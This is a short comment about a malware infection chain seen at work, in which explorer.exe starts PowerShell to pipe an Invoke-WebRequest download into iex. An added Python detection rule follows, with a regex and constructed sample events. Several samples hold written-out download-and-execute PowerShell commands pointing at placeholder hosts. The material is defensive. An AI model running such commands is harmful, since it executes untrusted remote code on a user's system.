Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an Invoke-WebRequest piping the download into an Invoke-Expression (usually the shorter iex alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.
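
A detection check for the process chain described in the comment above, as an added example that is not part of the original comment. It assumes process-creation events with Sysmon-style field names (ParentImage, Image, CommandLine); the sample events, paths and URLs are constructed, and pwsh.exe and the iwr alias are included beyond what the comment mentions.

```python
import re

# Invoke-WebRequest (or its iwr alias) whose output is piped into
# Invoke-Expression (or its iex alias), case-insensitively.
PIPE_TO_IEX = re.compile(
    r"\b(?:invoke-webrequest|iwr)\b[^|]*\|\s*(?:invoke-expression|iex)\b",
    re.IGNORECASE,
)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def matches_chain(event):
    """True when explorer.exe started PowerShell with a download piped to iex."""
    return (
        basename(event["ParentImage"]) == "explorer.exe"
        and basename(event["Image"]) in ("powershell.exe", "pwsh.exe")
        and PIPE_TO_IEX.search(event["CommandLine"]) is not None
    )

def flag_events(events):
    """Indices of the events that match the chain."""
    return [i for i, e in enumerate(events) if matches_chain(e)]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not taken from any real log).
SAMPLE_EVENTS = [
    # 0: the chain from the comment, using the short alias
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell.exe -c "Invoke-WebRequest https://example.invalid/a | iex"'},
    # 1: user-started PowerShell with an unrelated pipeline
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -c Get-ChildItem | Sort-Object Length"},
    # 2: download to disk only, nothing piped into an evaluator
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -c iwr https://example.invalid/f.zip -OutFile f.zip"},
    # 3: same command line, but a different parent than the one described
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": 'powershell.exe -c "iwr https://example.invalid/a | Invoke-Expression"'},
]

if __name__ == "__main__":
    for i in flag_events(SAMPLE_EVENTS):
        print("match:", SAMPLE_EVENTS[i]["CommandLine"])
```

The parent check ties the rule to the explorer.exe launch the comment describes; dropping it would also flag event 3, at the cost of matching any script that pipes a download into iex.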